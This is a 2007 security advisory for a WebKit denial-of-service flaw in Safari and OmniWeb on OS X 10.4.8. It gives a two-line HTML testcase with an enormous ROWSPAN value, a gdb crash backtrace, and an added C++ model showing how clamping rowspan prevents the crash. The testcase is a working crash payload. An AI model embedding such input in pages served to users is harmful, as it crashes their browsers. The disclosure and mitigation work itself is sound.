Apple OS X WebKit WebCore::ArrayImpl "ROWSPAN" DoS

Release Date:
January 14th, 2007

Severity:
Low

Vendor:
Apple

Versions Affected:
Apple OS X 10.4.8
Safari 2.0.4 (419.3)
WebKit build 18794
OmniWeb 5.5.3

Overview:
A denial of service (null pointer dereference) vulnerability exists within WebKit which allows an attacker to post a specially crafted .html page that causes the application to crash. This is basically a follow-up to another flaw, reported by Yannick von Arx, that was fixed in the latest build of WebKit but was not fixed in Safari.

Technical Details:
Below is a testcase to reproduce this issue:

<TABLE>
<TD ROWSPAN=40000001>

Below is the crash triggered on OS X 10.4.8 against OmniWeb 5.5.3:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x3456fbee in WebCore::ArrayImpl::ArrayImpl ()
(gdb) bt
#0 0x3456fbee in WebCore::ArrayImpl::ArrayImpl ()
#1 0x34636a28 in WebCore::RenderTableSection::ensureRows ()
#2 0x34637417 in WebCore::RenderTableSection::addCell ()
#3 0x34638b20 in WebCore::RenderTableRow::addChild ()
#4 0x3456042b in WebCore::NodeImpl::createRendererIfNeeded ()
#5 0x3448a1a0 in WebCore::ElementImpl::attach ()
#6 0x3447ec73 in WebCore::HTMLParser::insertNode ()
#7 0x3447f210 in WebCore::HTMLParser::handleError ()
#8 0x3447ec4c in WebCore::HTMLParser::insertNode ()
#9 0x3447f210 in WebCore::HTMLParser::handleError ()
#10 0x3447ec4c in WebCore::HTMLParser::insertNode ()
#11 0x34481402 in WebCore::HTMLParser::parseToken ()
#12 0x34482732 in WebCore::HTMLTokenizer::processToken ()
#13 0x344867de in WebCore::HTMLTokenizer::parseTag ()
#14 0x344884fb in WebCore::HTMLTokenizer::write ()
#15 0x34533ae0 in WebCore::Frame::write ()
== snip ==
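The backtrace above shows the attribute value travelling unchecked from the parser into RenderTableSection::ensureRows, where the row table is grown to the requested size and the result of the failed growth is dereferenced. The following C++ model is an added illustration written for this advisory, not WebKit or WebCore code: the names parseRowSpanRaw, parseRowSpanClamped, TableSection, RowEntry, kMaxRowSpan and rowTableBytes are all hypothetical, and the per-row size is that of the toy struct, not WebCore's. It shows the mitigation side: clamping the attribute at parse time and refusing out-of-bound growth in the section, so a huge ROWSPAN is reduced to a bounded request instead of an allocation the renderer cannot satisfy. The 65534 cap is the limit the HTML specification applies to rowspan.

```cpp
// Added example, not WebKit/WebCore code: a minimal model of the
// rowspan -> row allocation path and the clamp that bounds it.
// All names (parseRowSpanRaw, TableSection, kMaxRowSpan, ...) are hypothetical.
#include <cstdint>
#include <iostream>
#include <string>
#include <vector>

// Upper bound on the rows one cell may span. 65534 is the cap the HTML
// specification applies to rowspan; any larger value is clamped to it.
static const uint32_t kMaxRowSpan = 65534;

// Lenient attribute lexing as HTML parsers do it: read leading decimal
// digits, ignore whatever follows, treat missing/zero/garbage as 1.
// Saturates at UINT32_MAX instead of wrapping. No upper bound is applied:
// this is the unchecked value the crashing path in the advisory received.
uint32_t parseRowSpanRaw(const std::string& attr) {
    uint64_t value = 0;
    bool sawDigit = false;
    for (char c : attr) {
        if (c < '0' || c > '9') break;
        sawDigit = true;
        value = value * 10 + static_cast<uint64_t>(c - '0');
        if (value > UINT32_MAX) return UINT32_MAX;   // saturate, never wrap
    }
    if (!sawDigit || value == 0) return 1;
    return static_cast<uint32_t>(value);
}

// Hardened parse: identical lexing, then clamp to kMaxRowSpan so the
// layout code can never be asked for tens of millions of rows.
uint32_t parseRowSpanClamped(const std::string& attr) {
    uint32_t v = parseRowSpanRaw(attr);
    return v > kMaxRowSpan ? kMaxRowSpan : v;
}

// Model of a table section's row storage. ensureRows() plays the role of
// the growth routine in the backtrace; instead of trusting the caller and
// dereferencing the result of a failed allocation, it refuses out-of-bound
// requests and reports the refusal to the caller.
struct RowEntry { std::vector<int> cells; };

struct TableSection {
    std::vector<RowEntry> rows;

    bool ensureRows(uint32_t numRows) {
        if (numRows > kMaxRowSpan) return false;   // defence in depth
        if (rows.size() < numRows) rows.resize(numRows);
        return true;
    }

    // A cell spanning `rowSpan` rows from `row` needs row + rowSpan rows in
    // the section. Returns false when that request is refused.
    bool addCell(uint32_t row, uint32_t rowSpan) {
        uint64_t needed = static_cast<uint64_t>(row) + rowSpan;
        if (needed > kMaxRowSpan) return false;
        if (!ensureRows(static_cast<uint32_t>(needed))) return false;
        rows[row].cells.push_back(static_cast<int>(rowSpan));
        return true;
    }
};

// Bytes the row table would occupy for `numRows` rows in this model; the
// unchecked path hands a figure of this shape straight to the allocator.
uint64_t rowTableBytes(uint32_t numRows) {
    return static_cast<uint64_t>(numRows) * sizeof(RowEntry);
}

int main() {
    const std::string attr = "40000001";   // value from the advisory's testcase
    std::cout << "raw rowspan     : " << parseRowSpanRaw(attr)
              << " (" << rowTableBytes(parseRowSpanRaw(attr)) << " bytes requested)\n";
    std::cout << "clamped rowspan : " << parseRowSpanClamped(attr)
              << " (" << rowTableBytes(parseRowSpanClamped(attr)) << " bytes requested)\n";
    TableSection section;
    std::cout << "addCell raw     : "
              << (section.addCell(0, parseRowSpanRaw(attr)) ? "ok" : "refused") << "\n";
    std::cout << "addCell clamped : "
              << (section.addCell(0, parseRowSpanClamped(attr)) ? "ok" : "refused") << "\n";
    return 0;
}
```

Compile with any C++11 compiler and run; the raw path is refused while the clamped path succeeds with a table of 65534 rows. The two checks are deliberately redundant: clamping at the parser fixes the input, and the bound in the growth routine protects the renderer from any other caller that forgets to clamp.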

Solution:
Get Firefox!

Discovered by:
Tom Ferris
tommy[at]security-protocols[dot]com

Related Links:
http://security-protocols.com/poc/sp-x41.html
http://security-protocols.com/sp-x41-advisory.php
http://nightly.webkit.org
http://developer.apple.com/opensource/internet/webkit.html
http://omnigroup.com/applications/omniweb/

Security-Protocols.com :: 1999-2008